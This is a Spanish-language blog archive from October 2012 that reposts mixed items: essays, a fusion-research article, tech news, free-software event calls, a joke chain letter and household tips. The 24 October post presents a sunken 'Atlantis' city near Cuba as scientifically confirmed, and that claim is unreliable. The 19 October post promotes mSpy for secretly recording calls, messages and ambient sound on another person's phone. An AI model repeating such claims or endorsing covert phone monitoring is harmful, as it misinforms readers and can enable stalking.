31 octubre 2012

Y eso nos vuelve feos. Y eso nos vuelve amargados.

Negamos nuestra propia belleza porque los otros no pueden, o no quieren, reconocerla. En vez de aceptarnos como somos, procuramos imitar lo que vemos a nuestro alrededor.

Buscamos ser como aquellos a quienes todos dicen: "¡Que bonito!" Poco a poco, nuestra alma se va debilitando, nuestra voluntad disminuye, y todo el potencial que teniamos para enfrentar al mundo deja de existir.

Olvidamos que el mundo es aquello que imaginamos ser.

Dejamos de tener el brillo de la luz y pasamos ser la poza de agua que la refleja. Al dia siguiente, el sol evaporara esa agua, y nada quedara.

Todo porque alguien dijo: "Eres feo". U otro comento: "Ella es bonita". Con solo dos o tres palabras, fueron capaces de robarnos toda la confianza que teniamos en nosotros mismos.

Y eso nos vuelve feos. Y eso nos vuelve amargados.

Manuscrito encontrado en Accra

30 octubre 2012

¿Por qué nos cuesta tanto dejar de POSTERGAR?

Procrastinar quiere decir postergar. Dejar para mañana.

Se trata de una postergación muy especial: sabemos qué es lo que tenemos que hacer, pero lo dejamos para otro momento.
Varias razones nos llevan a procrastinar:
  • Falta de interés.
  • Cansancio físico.
  • Poca actitud hacia el esfuerzo.
  • Exceso de ansiedad (que no nos permite ni siquiera arrancar).
  • Aburrimiento, hastío.
  • Falta de destrezas reales para comenzar con la tarea.

Pero, por lo general, la postergación tiene un trasfondo.

Hacer las cosas a último momento nos hace mantener una fantasía: la fantasía de que, si le hubiésemos dedicado tiempo, hubiéramos hecho algo mucho mejor.

“Por haberlo hecho en sólo dos días y haberlo terminado a las apuradas”, nos justificamos, “está bastante bien”.

Es decir, nosotros mismos creamos un entorno de urgencia ficticio.

La urgencia es ficticia porque la decisión de postergar fue nuestra. Y, así suponemos que lo que logramos debería ser valorado especialmente porque fue hecho a último momento.

Esta ficción nos es cómoda. Porque nunca corroboramos si es real.

Es decir, nunca constataremos que habiendo dedicado todo el tiempo que correspondía, la tarea hubiera salido mejor.

Suponemos que sí. Pero no lo sabemos.

Y así, nos quedamos con una especie de “sucedáneo” de la creatividad: el ingenio. Somos ingeniosos para “arreglárnoslas” con el tiempo que tenemos. Pero no intentamos dedicar nuestra creatividad a disponer de más tiempo o, en general, disponer de más recursos.

Un mecanismo similar funciona para aquellas personas que dicen haber imaginado ideas excelentes, brillantes, sobresalientes.

Claro, todavía no han tenido tiempo de llevarlas a cabo, lo cual les permite seguir sosteniendo la excelencia de sus ideas.

Por eso es tan importante la acción en creatividad. Ponernos a trabajar (y dejar de postergar) es las mejores maneras de empezar a ser creativos.
Tomado de: http://eduardokastika.posterous.com/por-que-es-tan-sencillo-postergar

29 octubre 2012

Un paso más hacia la fusión nuclear

Artículo publicado por Daniel Clery el 18 de septiembre de 2012 en Science Now

En la carrera por hacer realidad la energía de fusión, un pequeño laboratorio puede estar poniendo en aprietos a los chicos mayores. Los esfuerzos a nivel mundial por aprovechar la fusión – la fuente de energía del Sol y las estrellas – como fuente de energía en la Tierra, actualmente se centran en dos instalaciones con costes multimillonarios: el reactor de fusión ITER en Francia, y la Instalación Nacional de Ignición (National Ignition Facility – NIF) en California. Pero existen otras aproximaciones más baratas – y una de ellas puede tener una posibilidad de alcanzar el “punto de inflexión”, un hito clave en el que un proceso produce más energía de la necesaria para disparar la reacción de fusión. Los investigadores del Laboratorio Nacional Sandia en Albuquerque, Nuevo México, anunciarán en un artículo aceptado para su publicación en la revista Physical Review Letters(PRL) que su proceso, conocido como fusión inercial de funda magnetizada (MagLIF) propuesto por primera vez hace 2 años, ha superado la primera de las tres pruebas, colocándolo en el camino de lograr el codiciado “punto de inflexión”. Las pruebas del resto de componentes del proceso continuarán el próximo año, y el equipo espera abordar su primer intento de fusión a finales de 2013.


Prototipo de fusión nuclear de Sandia © by NNSANews


Los reactores de fusión calientan y comprimen el plasma – un gas ionizado – compuesto de tritio y deuterio, isótopos del hidrógeno, compactando los mismos hasta que sus núcleos superan la repulsión mutua y se fusionan. A partir de esta olla a presión surgen núcleos de helio, neutrones y una gran cantidad de energía. La temperatura requerida para la fusión es de más de 100 millones de grados C — por lo que tienes que usar una gran cantidad de energía antes de empezar a obtener alguna. ITER y NIF están planificando cómo atacar este problema de distintas formas. El ITER, que tiene planificada su puesta en marcha para 2019 o 2020 intentará la fusión conteniendo un plasma con enormes campos magnéticos y calentándolo con haces de partículas y ondas de radio. NIF, por su parte, toma una minúscula cápsula llena de combustible de hidrógeno y la aplasta con un potente pulso láser. NIF ha estado funcionando durante unos pocos años, pero aún tiene que superar el punto de inflexión.

La técnica MagLIF de Sandia es similar a la del NIF ya que aplasta rápidamente su combustible – un proceso conocido como fusión por confinamiento inercial. Pero para lograrlo, MagLIF usa un pulso magnético en lugar de láseres. La diana en MagLIF es un diminuto cilindro de unos 7 milímetros de diámetro; está hecho de berilio y lleno de deuterio y tritio. El cilindro, conocido como funda, está conectado al enorme generador de pulsos electros de Sandia (conocido como máquina Z), que puede proporcionar 26 millones de amperios en un pulso de un milisegundo de duración o menos. Tal corriente pasando a través de las paredes del cilindro crea un campo magnético que ejerce una fuerza hacia el interior de las paredes de la funda, destrozándolo instantáneamente – y comprimiendo y calentando el combustible de fusión.

Los investigadores conocen desde hace algún tiempo esta técnica de aplastar una funda para calentar el combustible de fusión. Pero la propia configuración de la máquina MagLIF-Z no produjo suficiente calor; se necesitó algo de calor extra para hacer que el proceso fuese capaz de alcanzar el punto de inflexión. El investigador de Sandia Steve Slutz dirigió un equipo que investigó varias mejoras mediante simulaciones por ordenador del proceso. En un artículo publicado en Physics of Plasmas en 2010, el equipo predijo que podría alcanzarse el punto de inflexión con tres mejoras.

Primero, tenían que aplicar el pulso de corriente mucho más rápidamente, en apenas 100 nanosegundos, para aumentar la velocidad de implosión. También precalentaron el combustible de hidrógeno dentro de la funda con un pulso láser antes de que la máquina Z entrase en acción. Y finalmente colocaron dos bobinas eléctricas alrededor de la funda, una en cada extremo. Estas bobinas producen un campo magnético que une ambas, envolviendo la funda en un aislamiento magnético. Este aislamiento evita que las partículas cargadas, como los electrones y los núcleos de helio, escapen y enfríen el plasma – por lo que la temperatura se mantiene caliente.

El físico de plasma de Sandia Ryan McBride lidera un proyecto para ver si las simulaciones son correctas. El primer elemento en la lista es poner a prueba la rápida compresión de la funda. Un parámetro crítico es el espesor de la pared de la misma: Cuanto más fina sea, más rápidamente se acelerará mediante el pulso magnético. Pero el material de la pared también empieza a evaporarse durante el pulso, y si se rompe demasiado pronto, destruirá la compresión. Por otra parte, si la pared es demasiado gruesa no alcanzará una velocidad lo bastante alta. “Hay un punto dulce en el medio donde permanece intacta y puedes seguir logrando una velocidad de implosión bastante buena”, dice McBride.

Para poner a prueba el punto dulce predicho, McBride y su equipo configuraron un elaborado sistema de imagen que implicaba el hacer impactar un láser de alta potencia sobre una muestra de manganeso (en realidad un prototipo del NIF trasladado a Sandia) para producir rayos X. Haciendo incidir los rayos X a través de la funda en varias etapas de la implosión, los investigadores pudieron fotografiar qué sucedía. Encontraron que en el espesor del punto dulce, la funda mantenía su forma a lo largo de la implosión. “Funcionó como se predijo”, dice McBride. El equipo tiene previsto poner a prueba ahora otras dos mejoras – el precalentamiento del láser y el aislamiento magnético —el año que viene, y luego unirlo todo para hacer un intento de alcanzar el punto de inflexión antes de finales de 2013.

A principios de este año, Slutz y su equipo publicaron otras simulaciones en PRL que demostraron que si se construía un generador de pulsos más potente que produjese corrientes más altas – por ejemplo, 60 millones de amperios – el sistema podría lograr no solo el punto de inflexión, sino una alta ganancia. En otras palabras, MagLIF podría producir el tipo de energía necesaria para una planta de energía comercial de fusión.

“Estoy entusiasmado con el descubrimiento de Sandia de que la fusión de diana magnetizada… sea un camino para una ganancia significativa en la máquina Z. Estamos de acuerdo y esperamos que sus experimentos tengan una oportunidad de intentarlo”, dice Glen Wurden, director del equipo de plasma magnetizado en el Laboratorio Nacional de Los Álamos en Nuevo México.

Autor: Daniel Clery
Fecha Original: 18 de septiembre de 2012
Enlace Original
 Tomado de: http://www.cienciakanija.com/2012/10/01/un-paso-mas-hacia-la-fusion-nuclear/

28 octubre 2012

LIFX, el proyecto de reinvención de la bombilla a través de Wi-Fi

Mucho se ha hablado desde la invención de la lámpara incandescente de Edison sobre la capacidad de comercializar una bombilla “eterna”. Desde el pasado 1 de septiembre, la tecnología que revolucionó la vida de todos, la bombilla incandescente, dejó de fabricarse y distribuirse. Ha llegado el momento de la tecnología LED y de las bombillas de bajo consumo a gran escala. Con esta idea nace LIFX en Kickstarter, la re-invención de la bombilla LED a través de una red inalámbrica que podremos controlar desde nuestro smartphone.
¿Y de qué se trata? Como vemos en el vídeo, la idea de Phil Bosua sobre LIFX es construir una bombilla que se habilite a través de wifi. Una “lámpara” multicolor de energía eficiente a través de luz LED que podremos controlar con nuestro iPhone o Android.
LIFX ofrecería un control total sobre las luces de nuestro hogar sin precedentes a través de esta tecnología, reduciendo costes de energía y con una duración aproximada de vida de hasta 25 años.
LIFX
Según Phil Bosua, el hombre detrás de LIFX:
LIFX responde a una necesidad verdaderamente atrasada. Todo el mundo necesita bombillas. Las bombillas existentes se basan en una tecnología arcaica que amenaza nuestro medio ambiente. Las bombillas consumen aproximadamente el 20% de la electricidad en los hogares de todo el mundo. Tienen que ser más eficientes, más inteligente y durar más. En el siglo XXI, las personas necesitan una iluminación que coincide con la “cultura inteligente” y las sensibilidades ecológicas conscientes de nuestros días.
Con una configuración realmente sencilla, los investigadores detrás del proyecto cuentan que el usuario tan sólo deberá sustituir las bombillas existentes por las LIFX. Luego deberemos descargar e instalar la aplicación gratuita desde la App Store o Google Play y listo.
LIFX
Una vez instalada, la tecnología ofrece multitud de opciones como:
  • Controlar las luces desde cualquier lugar.
  • Elegir la intensidad de la bombilla de forma individual, tanto las que se encuentran en una habitación como en toda la casa.
  • Es multicolor, por lo que la app nos ofrece la posibilidad de adaptarlas al momento que queramos.
  • La posibilidad de recibir notificaciones de Twitter, Facebook o textos a través de una señal de luz que nos indica la llegada de mensajes.
  • Evidentemente, la reducción en consumo de energía y ahorro de dinero.
  • Modo seguridad para cuando estemos de vacaciones o en largas temporadas fuera del hogar.
  • La posibilidad de crear juegos de luces.
LIFX
Junto a estas posibilidades, sus creadores hablan de un próximo Kit, un SDK para que los desarrolladores sean capaces de lanzar nuevas aplicaciones en el futuro.
Un proyecto que se ha iniciado hace dos días, el pasado sábado, con una gran aceptación en la red. Necesitaba de una financiación de 100.000 dólares y el proyecto ya sobrepasa los 232.000 dólares.
Ahora bien, aunque el proyecto supone un paso adelante en la fusión de las nuevas tecnologías con la utilización de la bombilla en los hogares o comercios, está por ver si realmente atiende a las necesidades de los usuarios. Quizá no todo el mundo esté dispuesto a pagar 69 dólares por una sola bombilla que necesita de un smartphone y wifi para disfrutar de todas sus funcionalidades.

Tomado de: http://alt1040.com/2012/09/lifx-reinvencion-de-la-bombilla-a-traves-de-wifi

27 octubre 2012

Policía podrá impedir envío de fotos y vídeos durante protestas gracias a tecnología de Apple

17 de septiembre de 2012.- Apple ha patentado una tecnología que permitirá al gobierno y a la policía bloquear la transmisión de información, incluidos vídeos y fotografías, en cualquier reunión pública o lugar que consideren “sensible”, y “protegido del exterior”.
En otras palabras, estos poderes tendrán el control sobre lo que puede y no puede ser documentado con los dispositivos inalámbricos durante cualquier evento público. Y mientras que la compañía dice que los sitios afectados han de ser en su mayoría cines, teatros, campos de conciertos y lugares similares, Apple también dice que “las operaciones encubiertas de la policía o el gobierno pueden requerir “apagones completos”.

“Además”, dice Apple, “la transmisión inalámbrica de información sensible a una fuente remota es un ejemplo de una amenaza a la seguridad. Esta información sensible puede ser desde información clasificada del gobierno a las preguntas o las respuestas de un examen que se esté llevando a cabo en un ambiente académico.”

La declaración llevó a muchos a creer que las autoridades y la policía podrán ahora utilizar la función patentada durante las protestas o manifestaciones para bloquear las transmisiones de secuencias de video y fotografías de lo que ocurre allí, incluyendo los videos de brutalidad policial, que en los momentos de grandes eventos inundan inmediatamente las redes de comunicación y sitios web de vídeos.

Apple patentó el medio para transmitir una señal codificada a todos los dispositivos inalámbricos, ordenándoles desactivar las funciones de grabación.

Estas políticas se activarían por GPS y WiFi o móvil desde estaciones base, lo que haría un cerco alrededor de un edificio o de una “zona sensible” para evitar que las cámaras de teléfonos tomaran imágenes o grabaran vídeo.

Apple podría implementar la tecnología, pero no sería la decisión de Apple activar la “característica”, sino que serían los gobiernos, las empresas y los propietarios de redes los que establecerían dichas políticas, según el sitio web ZDNet technology.

Después de haber inventado uno de los dispositivos móviles más sofisticados, Apple parece estar buscando la manera de restringir su uso.

“A medida que los dispositivos inalámbricos, como teléfonos celulares, buscapersonas, dispositivos de medios personales y teléfonos inteligentes se han convertido en omnipresente, más y más personas están llevando estos dispositivos en diferentes entornos sociales y profesionales. El resultado es que estos dispositivos inalámbricos pueden a menudo molestar, frustrar, e incluso amenazar a la gente en lugares sensibles”.

Lo que para la compañía figura como lugares “sensibles” hasta el momento son en su mayoría las reuniones, la presentación de películas, ceremonias religiosas, bodas, funerales, conferencias académicas, y exámenes.

Tomado del sitio ZDNet technology

26 octubre 2012

Raspbery Pi: todo el software -incluidos los drivers de Broadcom- ya es Open Source

Grandes noticias del equipo que desarrolla el Raspberry Pi, que hoy ha anunciado que el código del driver VideoCore que se ejecuta en el procesador ARM de los RPi ya es Open Source bajo licencia BSD.
broadcom raspberry pi 500x409 Raspbery Pi: todo el software  incluidos los drivers de Broadcom  ya es Open Source
El código está ya disponible en el repositorio del proyecto Raspberry Pi en GitHub, y aunque parezca que esto no representa una diferencia especial con el estado del proyecto hasta ahora, es un salto muy importante ya que como afirman en el anuncio oficial “todo lo que corre en el ARM ya es Open Source“.
Eso significa que por ejemplo entre otras cosas los desarrolladores podrán “implementar soporte para clientes Wayland EGL y para servidores EGL, o proporcionar mejor integración de GLES/VG en X.Org“. Además será de gran ayuda para todos los que quieran utilizar los Raspberry Pi con otros sistemas operativos, y de hecho hay proyectos que tratan de instalar FreeBSD, NetBSD, Plan 9, RISC OS, Haiku y otros en estos dispositivos, y ahora eso será mucho más accesible.
Architecture and Source 266x300 Raspbery Pi: todo el software  incluidos los drivers de Broadcom  ya es Open Source
El protagonista de esta noticia es sin duda alguna Broadcom, una empresa pionera a la hora de proporcionar controladores totalmente open Source. Ni parciales, ni obtenidos por ingeniería inversa, algo que marca la diferencia con otros proyectos -por ejemplo, los de NVIDIA y AMD, que tienen un grado de implicación menos claro -aunque AMD sí ha hecho esfuerzos muy importantes, todo hay que decirlo-.
Fantásticas noticias para el proyecto y para el mundo Open Source.
Tomado de: http://www.muylinux.com/2012/10/24/raspbery-pi-todo-el-software-incluidos-los-drivers-de-broadcom-ya-es-open-source/

Test de la fruta

Imagina que estás en medio de la selva y encuentras una cabaña a la orilla de un río. Entras en la cabaña y ves a su izquierda 7 camas pequeñas y a la derecha una pequeña mesa con 7sillas. Sobre la mesa hay una canasta con 5 tipos de frutas. Éstas son:
- Manzana
- Plátano
- Fresa
- Melocotón
- Naranja
¿Qué fruta escogerías? - Tu selección revela mucho de ti.


RESULTADOS:
Manzana: significa que eres el tipo de persona que le gusta comer manzanas.
Plátano: significa que eres el tipo de persona que le gusta comer plátanos.
Fresa: significa que eres el tipo de persona que le gusta comer fresas.
Melocotón: significa que eres el tipo de persona que le gusta comer melocotones.
Naranja: significa que eres el tipo de persona que le gusta comer naranjas.

Apuesto que me quieres mandar a la mierda.
Yo también estoy buscando al Hijo Puta que me mandó esta estupidez.
Pero te sugiero: Sé vengativo, mándale el mensaje a tus contactos y sé Feliz.

Tomado de: http://www.lonuncavisto.com/

25 octubre 2012

Call de Charlas - I Jornadas Libres del Norte -Edicion 2012

SaltaLUG - Grupo de Usuarios de Software Libre de Salta y la Asociacion

Civil Mentes Libres la invita a la comunidad de software libre a participar de las "I Jornadas Libres del Norte"; el evento se llevará a cabo durante los días 30 de Noviembre y 1° de Diciembre de 2012 en el campus de la Universidad Nacional de Salta - Av. Bolivia 5150 (Salta, Argentina).

Llamado a Charlas
-----------------
El objetivo es generar un espacio de encuentro entre los profesionales, usuarios, activistas de las tecnologias libres y cultura libre, con el afan de fortalecer las actividades que se realizan en las diferentes localidades del norte de nuestro pais, para promover su uso y desarrollo con el fin de lograr una sociedad mas justa, viable y sostenible.
La temática del evento es sobre el Software Libre, las Tecnologías Libres en la Educación, Gobierno, Empresas y desarrollos libres y Cultura libre . El autor de cada charla seleccionada podrá participar presencialmente, como orador en el evento. En los casos en que la charla sea realizada por varios autores, se permitirá un máximo de 3 oradores.

:Aclaración:
Por limitaciones presupuestarias, los organizadores sólo podrán financiar el alojamiento de los autores seleccionados que residan fuera de Salta. Por favor aclarar en las charlas si requieren de dicha cobertura.

Orientación de las charlas
--------------------------

La orientación, no excluyente, de las charlas puede ser:

**Ciencia, tecnología, programación y desarrollo**

Investigación científica y desarrollo tecnológico libre. El conocimiento y producción sirviéndose de las tecnologías libres o aportando a su desarrollo.

**Educación**

Desde la experiencia individual de migrar una computadora personal hasta
nuevas formas de gestionar una institución, existen innumerables vivencias
que nos gustaría conocer y que pueden ser replicadas. Proyectos con Software
libre aplicado a diferentes niveles educativos y a todas aquellas
experiencias exitosas o no relacionadas con la difusión y generación de
contenidos libres.


**Empresas y Negocios**

Estamos atravesando un fuerte periodo de ajuste en que las empresas descubren en las tecnologías libres un recurso para mejorar eficacia y eficiencia. Buscamos desarrollar la vinculación de los empresarios con las fuentes de conocimiento y desarrollo libre para propiciar la formación de nuevos negocios y alianzas estratégicas.


**Estado y Gobierno**

Queremos dar a conocer tanto las acciones que se están tomando, con los resultados obtenidos y la proyección que se espera como las que están en etapa de proyecto de manera de brindar apoyo y difusión para las mismas, para el bienestar de toda la comunidad.

**Cultura Libre**

Queremos dar a conocer sobre los derechos de propiedad intelectual y el alcance de los mismos sobre las obras y creaciones. Tambien como la cultura libre apoya y protege a creadores e innovadores. Cuales son el apoyo que se brinda a los creadores e innovadores y como se difunden en la actualidad.
*Dónde enviar las Charlas*
--------------------------

Se debe enviar un correo en texto plano y con archivo adjunto (en algún
formato libre, ver lista al final_) a la siguiente dirección de correo
electrónico  charlas@saltalug.org.ar  *Las charlas van a ser recibidas
hasta el 10 de noviembre  inclusive*.



*Cómo enviar las Charlas*
-------------------------

El envío de la propuesta de charla debe tener los siguientes datos:

:Estructura:
    - Título
        - Autor(es):
            - Nombre y apellido
        - Curriculum
        - Lugar de residencia
        - Telefono
        - LUG, organismo, o empresa a la que pertenece, si corresponde
:Tipo:
    Puede ser Charla tradicional o Taller (Con PC). indicar si  hay alguna
    necesidad particular.
:Duración:
    Las charlas generalmente son de 45’. En caso de que sea mayor o menor el tiempo requerido solicitamos su justificación.
:Descripción:
    Uno o dos párrafo(s) que expliquen el desarrollo del contenido de la presentación.
:Nivel:
    Clasificar el publico objetivo dentro de: novato / intermedio / avanzado.
:Tipo de publico:
    Ejemplo Público en general, promotores de SL, estudiantes (especificar nivel), etc.
:Conocimientos previos:
    Especificar que conocimientos previos deberán tener los asistentes.
:Temática:
    Temática general a la que pertenece la charla (ej. educación, pymes, gobierno, desarrollo libre)



.. _final:

*Formato de las presentaciones*
------------------------------
-

El envío de las diapositivas y/o presentaciones debe tener alguno de los
siguientes formatos:

    - OpenDocument format
    - HTML standard
    - Pyslide
    - Postscript
    - LaTeX
    - PDF
    - RST
    - Texto plano

La licencia del material presentado deberá permitir a la organización su posterior distribución. Se prefiere la licencia Creative Commons.

24 octubre 2012

Encuentran una ciudad bajo el Triángulo de las Bermudas

Tiene por lo menos cuatro pirámides y un complejo de edificios y monumentos. ¿Es la ciudad perdida de la Atlántida?
La Atlántida, el mítico continente que, según la leyenda, desapareció hace unos 10.000 años bajo las aguas del Océano Atlántico, puede haber sido descubierta. Así por lo menos lo aseguran los científicos canadienses Paul Weinzweig y Pauline Zalitzki, que mediante el uso de un robot sumergible confirmaron su existencia: en el fondo del océano, a la profundidad de unos 700 metros cerca de las costas de Cuba, se ubican las ruinas de una gigantesca ciudad hundida.


Los científicos empezaron su investigación hace unos 10 años, aunque su trabajo se obstaculizó, debido a que no pudieron encontrar fondos suficientes para la creación de un robot sumergible. La ciudad, que incluye al menos cuatro pirámides gigantes -una de ellas de cristal-, además de otras estructuras, se encuentra sorprendentemente dentro de los límites del legendario Triángulo de las Bermudas.

Según se apunta, el complejo cuenta también con magníficas esfinges y un idioma escrito grabado en las piedras, que tienen varios cientos de toneladas. Pauline Zalitzki afirma que el complejo pertenece a un periodo preclásico de la historia de América Central, poblado por "una civilización avanzada, similar a la cultura Teotihuacán".

El investigador agrega: "No sabemos con certeza lo que es, pero no creemos que la naturaleza sea capaz de producir arquitecturas simétricamente planeadas, a no ser que sea un milagro".

Según apuntan los investigadores, el Gobierno de EE.UU. descubrió el presunto lugar durante la crisis de los misiles en Cuba en los años sesenta, cuando los submarinos nucleares de crucero en el Golfo se encontraron con estructuras piramidales. El sitio inmediatamente fue cerrado y se tomó su control y el de los objetos.

Se cree que la Atlántida, mencionada y descrita por primera vez por el filósofo griego Platón, desapareció por una inundación, un gran terremoto o una erupción volcánica. A lo largo de años ha servido de inspiración para numerosas obras literarias, musicales y cinematográficas, especialmente historias de ciencia-ficción.
Fuente: Cadena RT

Tomado de: http://24con.infonews.com/conurbano/nota/75772-encuentran-una-ciudad-bajo-el-triangulo-de-las-bermudas/

23 octubre 2012

Memorias USB de usar y tirar en cartón Pincho USB en cartón por Art Lebedev

Pincho USB en cartón por Art Lebedev Todo eso del Wi-Fi, el Bluetooth y similares está muy bien, pero al final en la mayoría de los casos aún acabamos por recurrir a los pinchos USB cuando hay que pasarle un archivo a alguien.
El Flashkus es un diseño conceptual de Art. Lebedev Studio en el que los pinchos USB vendrían en tiras de cartón de las que podrías ir arrancándolos para dárselo a quien fuera o para grabar en ellos lo que necesitaras según los fueras necesitando.
Pinchos rotulados
Y lo cierto es que no suena nada descabellado.
(Vía Boing Boing).

Tomado de: http://www.microsiervos.com/archivo/arte-y-diseno/memorias-usb-de-usar-y-tirar-en-carton.html

22 octubre 2012

Elecciones...

"Lo que mucha gente llama amar consiste en elegir a una mujer y casarse con ella. La eligen, te lo juro, los he visto. Como si se pudiese elegir en el amor, como si no fuera un rayo que te parte los huesos y te deja estaqueado en la mitad del patio. Vos dirás que la eligen porque-la-aman, yo creo que es al verse. Vos no elegís la lluvia que te va a calar hasta los huesos cuando salís de un concierto."

Julio Cortázar, Rayuela

21 octubre 2012

La nueva generación de procesadores Atom no será compatible con Linux

Los dispositivos con los nuevos chips Atom no podrán ejecutar LinuxIntel anunció en su foro anual de desarrolladores que los procesadores Atom Clover Field han sido diseñados específicamente para Windows 8,  y por lo tanto no tendrán soporte oficial para Linux. Esto no sólo impediría utilizarlos con el principal sistema operativo libre, sino también con aquellos que se basan en él, como Android.
Los dispositivos con los nuevos chips Atom no podrán ejecutar Linux
La explicación de Intel es que Linux no puede utilizar las funciones P-State y C-State, que permiten que el sistema operativo controle la frecuencia de los núcleos según sea necesario, y que además “lleva muchísimo trabajo hacer que un procesador soporte un sistema operativo”. Sin embargo, Intel también ha dicho que la arquitectura Clover Field se basa principalmente en la de su antecesor, Medfield. En efecto, algunos dispositivos Android utilizan procesadores Atom Medfield, por lo que los motivos para no dar soporte a Linux en esta nueva generación no terminan de quedar del todo claros.
La verdadera razón, entonces, pareciera ser proteger a Microsoft de la competencia, y darle así una ventaja que le permita hacer pie en un área dominada por Android y iOS. Si bien es cierto que la comunidad Linux seguramente lanzará una versión adaptada a la nueva generación de Atom, es muy probable que los fabricantes de hardware se rehúsen a utilizar un sistema que no cuenta con el soporte oficial de Intel, quedando Windows 8 como única opción.
Fuente: TechCrunch

20 octubre 2012

VII Jornadas de Software Libre - Catamarca - Argentina

El día Sábado 27 de Octubre del corriente año, se realizará en las instalaciones de la Facultad de Tecnología y Ciencias Aplicadas, Universidad Nacional de Catamarca las "VII Jornadas de Software Libre", que tienen como principal objetivo promover el uso del Software Libre y la integración de las comunidades de usuarios participantes. El mencionado evento está organizado por Usuarios de Software Libre de Catamarca – Argentina (GULCAr) y La Facultad de Tecnología y Ciencias Aplicadas.

Lugar:
Link de Mapa de Google:
http://goo.gl/maps/pazWo

El coordinador del evento de este año: Prof. José Joaquín Aguirres nos habló del mismo y las diferentes temáticas a abordar:
Las jornadas de software libre se realizan cada año en nuestra provincia siendo ésta la septima edición que llevamos a cabo con la colaboración de los miembros de GULCAr y la Facultad de Tecnología y Cs. Aplicadas.

Tenemos el agrado de contar con disertantes de las provincias de Tucumán, Chaco y nuestra querida Catamarca. Los mismos son expertos en informática y referentes en diferentes eventos que se realizan en diferentes puntos de nuestro país.

Cronograma de Actividades:

Turno Mañana:

8:30 - 9:00 | Inscripción, Acreditación y Apertura
9:00 - 10:00 | Me colgué del Software Libre - Martín Miranda
10:00 - 11:00 | El Software Libre en La educación - Profesor José Joaquín Aguirres - Ing. Marcelo Ovejero
11:00 - 12:00 | Primeros pasos en GNU/Linux - Técnico Instructor Hernán Herrera

Break

Turno Tarde:

14:00 - 15:00 | Clonezilla, Implementacion, Configuracion y Uso - Técnico Instructor Hernán Herrera
16:00 - 18:00 | Desarrollo de aplicaciones web + móvil con herramientas open source - Martín Miranda (Catamarca) - Luciano Laporta (Tucuman)

Expo:
Se realizará una exposición donde los asistentes tendrán contacto con diferentes productos y servicios informáticos, software libre y desarrollos tecnológicos.

Talleres Relámpago.
Habrá una serie de talleres mostrando las bondades de diferentes aplicaciones de software para diferentes necesidades.

Sobre GULCAr.

El Grupo GULCAr, (Grupo de Usuarios de Software Libre de Catamarca – Argentina), esta conformada por alumnos, docentes y no docentes, profesionales y entusiastas de la informática, cuyo fin es promover el uso del Software Libre en el ámbito académico y extenderlo así a la sociedad misma, bajo el principio de que el modelo de desarrollo de esta tecnología de software, es un valioso recurso para la educación. No sólo porque pueda ser técnica o pedagógicamente superior a las alternativas de software no libre o propietarias, sino porque promueve valores tan importantes en el ser humano tales como libertad de conocimientos, cooperación desinteresada, para que cualquier persona pueda beneficiarse de la creación de software de una persona o grupo de personas sin que esto pueda ser un acto ilegítimo ante la ley.

Sobre Software Libre:

Se considera Software Libre a aquellos programas de computadora que, por sus términos de licencia ofrecen a usuarios y desarrolladores cuatro libertades:

- la libertad de usar el programa con cualquier propósito,
- la libertad de estudiar el código fuente y adaptarlo a las propias necesidades
- la libertad de hacer y distribuir copias
- la libertad de mejorar el programa y redistribuir las mejoras.

El software constituye hoy la técnica cultural de la era digital.
Programas informáticos gestionan las comunicaciones y almacenan la memoria de las sociedades modernas. En este marco de informatización creciente de los procesos sociales, el acceso a los programas informáticos es no sólo una cuestión estratégica en el campo económico y tecnológico, sino y principalmente en el campo de la independencia política, la cultura y el acceso a conocimientos esenciales para la vida cotidiana.

Te esperamos en la Gran Fiesta!
Favor de difundir. Inviten a sus amigos.
Muchas Gracias!

Entrada Libre y Gratuita. "El conocimiento no tiene precio".

Puedes colaborar con la organización de GULCAr abonando el importe de $30.00 obteniendo los siguientes beneficios:

1 Carpeta
1 Lapicera
3 Hojas
Cronograma de Actividades
Certificado de Asistencia.


Auspiciantes:
Radio Estilo 93.3 Piedra Blanca.
Consejo Profesional de Ciencias Informáticas Catamarca - www.cpcicat.org.ar


Informes e Inscripciones: www.gulcar.org

Evento de Facebook: www.facebook.com/events/164272103697157
Grupo de Facebook: www.facebook.com/groups/gulcar

Organizado por:
GULCAr - Grupo de Usuarios GNU/Linux Catamarca Argentina
Facultad de Tecnología y Ciencias Aplicadas
Maximio Victoria Nº 55 - San Fernando del Valle de Catamarca.

19 octubre 2012

Mspy, la aplicación de monitorización, control y antirrobo todo en uno

Mspy es una de las aplicaciones más completas que podéis encontrar si lo que buscáis es tener control absoluto de vuestro Android y ahora os vamos a decir por qué.

Con esta aplicación podrás desde localizar el teléfono en caso de perderlo y que te lo roben, acceder a wipe remoto para controlar el teléfono incluso cuando estemos físicamente lejos de él; hasta registrar y hacer copias de seguridad de todo tipo de datos de SMS, navegador, memoria, contactos y correos, y detalles de grabación de llamadas... para que no se te escape nada.




También podrás controlar, en el caso de tener hijos o sean terminales de empresa, el uso que hagan del teléfono.

Además tendrás completo acceso a las fotos y vídeos del teléfono, así como toda la lista de aplicaciones y cualquier icono, aunque esté oculto.

Una de las utilidades más curiosas consiste en que graba sonido del ambiente, una habilidad muy útil y que envidiaría la misma Mata Hari.

Lo único que tendréis que hacer, a parte de descargar la aplicación, es registraros en su web para poder acceder a todas las utilidades antes mencionada, sobre todo las relacionadas con la seguridad, antirrobo, etc.

Por último, y aunque pueda parecer increible, Mspy es completamente gratuíta, así que os dejamos el link a la web de Google Play por si queréis probarla, desde luego merece la pena.

Descargar Mspy: Android.

Tomado de: http://www.nosolounix.com/2012/09/mspy-la-aplicacion-de-monitorizacion.html

18 octubre 2012

25 Usos sorprendentes del Bicarbonato de Sodio



El bicarbonato de sodio ayuda a regular el pH manteniendo en un punto medio, ni demasiado ácido ni demasiado alcalino. Cuando el bicarbonato de sodio se pone en contacto ya sea con un ácido o una sustancia alcalina, su efecto natural es neutralizar el pH. Más allá de eso, el bicarbonato de sodio tiene la capacidad de retardar más cambios en el equilibrio del pH, conocidos como tampón. Esta capacidad dual de neutralizar y amortiguar permite que el bicarbonato de sodio haga cosas tales como neutralizar los olores ácidos (como en el refrigerador), así como mantener el pH neutro (como en el agua de lavado, lo que ayuda a aumentar la potencia de su detergente). Es una reacción simple, pero que tiene efectos de largo alcance para una serie de tareas de limpieza y desodorización. Aquí te presentamos los siguientes usos:

Cuidado Personal

1. Hacer pasta de dientes

Una pasta hecha de bicarbonato de sodio y una solución de peróxido de hidrógeno al 3 por ciento puede ser utilizado como una alternativa a los comerciales de fluoruro no dentífricos. También se puede simplemente meter el cepillo de dientes con pasta de dientes en el bicarbonato de sodio para un aumentar el efecto.

